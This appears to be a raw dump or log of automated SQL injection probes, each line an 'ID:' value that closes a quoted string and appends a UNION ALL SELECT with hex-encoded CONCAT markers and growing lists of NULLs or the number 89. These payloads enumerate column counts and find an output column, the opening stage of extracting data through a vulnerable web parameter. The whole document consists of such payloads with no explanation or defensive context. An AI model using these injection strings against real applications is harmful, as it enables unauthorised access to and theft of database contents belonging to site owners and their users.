ID:-8568' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x71717462786c56714f64,0x7162717871)-- -
ID:-7348' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x70695a56476971675547,0x7162717871),NULL-- -
ID:-2043' UNION ALL SELECT CONCAT(0x716b717671,0x706146707850756d7642,0x7162717871),NULL,NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x694e5856595a4f4f6d73454a6e4b46614e6b42576f455a774f435a634e424a4c57564748566e426f,0x7162717871),92,92-- -
ID:1' UNION ALL SELECT 92,CONCAT(0x716b717671,0x43457a49657447416c65715a766841544763744c524363586e644a5578645258444b756e64586644,0x7162717871),92-- -
ID:1' UNION ALL SELECT 92,92,CONCAT(0x716b717671,0x5156616562766f776a627570657471416e577346446576596b72544165455a437a6a7a666a426368,0x7162717871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x6a736e62736e426e6441,0x7162717871),92,92-- -
ID:1' UNION ALL SELECT 92,CONCAT(0x716b717671,0x71647a484d6b63687366,0x7162717871),92-- -
ID:1' UNION ALL SELECT 92,92,CONCAT(0x716b717671,0x4a47715242424a685647,0x7162717871)-- -
ID:-1973' UNION ALL SELECT 92,92,CONCAT(0x716b717671,0x624e755a7945776e6d5044514e42644e734f74454571686f49554b6b6e4170734b70736d4a645a54,0x7162717871)-- -
ID:-5218' UNION ALL SELECT CONCAT(0x716b717671,0x4d76486d7372705858415571744470475375726778716f537a774d717a556e6b766447454e724a72,0x7162717871),92,92-- -
ID:-8582' UNION ALL SELECT 92,CONCAT(0x716b717671,0x426f416d454673574f61435a685276636977506d4176634a58714e4d7a6775467a4e484d5664776a,0x7162717871),92-- -
ID:-8572' UNION ALL SELECT 92,92,CONCAT(0x716b717671,0x4748785654586c506f41,0x7162717871)-- -
ID:-4103' UNION ALL SELECT CONCAT(0x716b717671,0x66595a7965425a74796b,0x7162717871),92,92-- -
ID:-1527' UNION ALL SELECT 92,CONCAT(0x716b717671,0x6a546e4f6d5648746d67,0x7162717871),92-- -
ID:1' UNION ALL SELECT NULL-- -
ID:1' UNION ALL SELECT NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x726b706958656d4d5655426d726578584a4d775a52444e6e724c73794e48535576764f73436c7347,0x7162717871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x6b6b49655879774a5446745063574f5841414c46695a4549586e7a5746464767697856774a6f4376,0x7162717871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x554359784a56614c4d645552696775446d566f4b775a736b764963554359514b7442576d48636c78,0x7162717871),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x6244504f42584d4e4e53,0x7162717871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x6948794e676f4a44664c,0x7162717871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x4e4d4449584f6b674d4c,0x7162717871),NULL-- -
ID:-7577' UNION ALL SELECT CONCAT(0x716b717671,0x644741526b65576b6d45784b4a73744c47484c446a6d4344767a5a4c6a6e78575446785058414253,0x7162717871),NULL,NULL-- -
ID:-4679' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x716661514477716b66504f55664b7a6858574b69774b506575544647565a4875624344686b795663,0x7162717871)-- -
ID:-8473' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x4c434b516d415a6d63474f697662616474596c636450795751744f4577666f6c546c764e6d496f78,0x7162717871),NULL-- -
ID:-8108' UNION ALL SELECT CONCAT(0x716b717671,0x4e41614c6e634978694c,0x7162717871),NULL,NULL-- -
ID:-7201' UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x6e4b7a6d44485048424f,0x7162717871)-- -
ID:-4705' UNION ALL SELECT NULL,CONCAT(0x716b717671,0x43596b4569667479586f,0x7162717871),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x4f6d55445a634f7045445a4176576770497358576142797a50555a714a78447a4657626541555858,0x7162717871),89,89-- -
ID:1' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x4d48535176527a504652786450584f657361636a6c6b4f62515a4e6e4d6959666b446f6554645347,0x7162717871)-- -
ID:1' UNION ALL SELECT 89,CONCAT(0x716b717671,0x4155434e4e4379514c53454d577179474166717a4966414747614874524d54564b757364447a4776,0x7162717871),89-- -
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x4841736d42456743744e,0x7162717871),89,89-- -
ID:1' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x595665744c67704b5877,0x7162717871)-- -
ID:1' UNION ALL SELECT 89,CONCAT(0x716b717671,0x6843446b6a4b546d6963,0x7162717871),89-- -
ID:-6205' UNION ALL SELECT 89,CONCAT(0x716b717671,0x7a696872754d4e7864767657695656414255454c6d526f4d446363616e4a525a4172425572775878,0x7162717871),89-- -
ID:-4442' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x7871524a66634266426554625965625965626c70686f617670796d5968696e6b766f784547415563,0x7162717871)-- -
ID:-1443' UNION ALL SELECT CONCAT(0x716b717671,0x7a6d77734d4d7570455242646c6e6e615273586a567a4575784e7a666d4153444a77564c44766a70,0x7162717871),89,89-- -
ID:-7816' UNION ALL SELECT 89,CONCAT(0x716b717671,0x6b6344736a45794a6755,0x7162717871),89-- -
ID:-6133' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x544776696c7254505272,0x7162717871)-- -
ID:-4461' UNION ALL SELECT CONCAT(0x716b717671,0x76466c764d594d6e4a62,0x7162717871),89,89-- -
ID:-8289' UNION ALL SELECT 89#
ID:-1955' UNION ALL SELECT 89,89#
ID:-5066' UNION ALL SELECT 89,89,89#
ID:-3468' UNION ALL SELECT 89,89,89,89#
ID:-1004' UNION ALL SELECT 89,89,89,89,89#
ID:-3333' UNION ALL SELECT 89,89,89,89,89,89#
ID:-2482' UNION ALL SELECT 89,89,89,89,89,89,89#
ID:-9581' UNION ALL SELECT 89,89,89,89,89,89,89,89#
ID:-7556' UNION ALL SELECT 89,89,89,89,89,89,89,89,89#
ID:-5351' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89#
ID:-9632' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89#
ID:-5430' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8433' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5680' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7215' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-1969' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6486' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8465' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9852' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4382' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x4b4173426a476a42666d41516b786b5a6c687366496c655a71424e634c45707075586b5150494e7a,0x7162717871),89,89#
ID:1' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x77485251474b6a59736e6c577965686b706248717249534e55526e7a5348544c5163587955565441,0x7162717871)#
ID:1' UNION ALL SELECT 89,CONCAT(0x716b717671,0x78575965695666564d516f4779516d4b6f6c6b7a6f566f4e756e566b796a72565254685978787853,0x7162717871),89#
ID:1' UNION ALL SELECT CONCAT(0x716b717671,0x4576656541656750666e,0x7162717871),89,89#
ID:1' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x74726a47774775674461,0x7162717871)#
ID:1' UNION ALL SELECT 89,CONCAT(0x716b717671,0x686c5956616e6748734a,0x7162717871),89#
ID:-9029' UNION ALL SELECT 89,CONCAT(0x716b717671,0x6151644a514b6d437073736f6741576949634744504946776d4a4d51504c66744f49587444574145,0x7162717871),89#
ID:-5894' UNION ALL SELECT CONCAT(0x716b717671,0x48627452796549467368436b424b536e4669526f5850724157627157536743436b536d4c76486263,0x7162717871),89,89#
ID:-9626' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x667a774c5443425049414b646947614c734d7a6d76566a4c55785a417164586c497979584d766d55,0x7162717871)#
ID:-6099' UNION ALL SELECT 89,CONCAT(0x716b717671,0x546172666d695a4a574f,0x7162717871),89#
ID:-3761' UNION ALL SELECT CONCAT(0x716b717671,0x62724a7555664d756166,0x7162717871),89,89#
ID:-4519' UNION ALL SELECT 89,89,CONCAT(0x716b717671,0x74506d5a596871716545,0x7162717871)#
ID:-9287' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-1575' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7019' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6164' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7059' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3044' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9047' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6747' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-2846' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5465' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7088' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9983' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3301' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4546' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7239' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6542' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5621' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6190' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3459' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9187' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5061' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5200' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4315' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9965' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9306' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7567' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5631' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4466' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9959' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8355' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6286' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7040' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9437' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7998' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5654' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3262' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6499' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9069' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4212' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3643' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8994' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3820' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7939' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4703' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4223' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9848' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4782' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7432' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6841' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5246' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4793' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7631' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-2269' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-2476' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9257' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-2670' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-2361' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8065' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4724' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4705' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7304' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4151' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5902' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4052' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9533' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7763' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5417' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8415' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6999' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-5612' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-1541' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
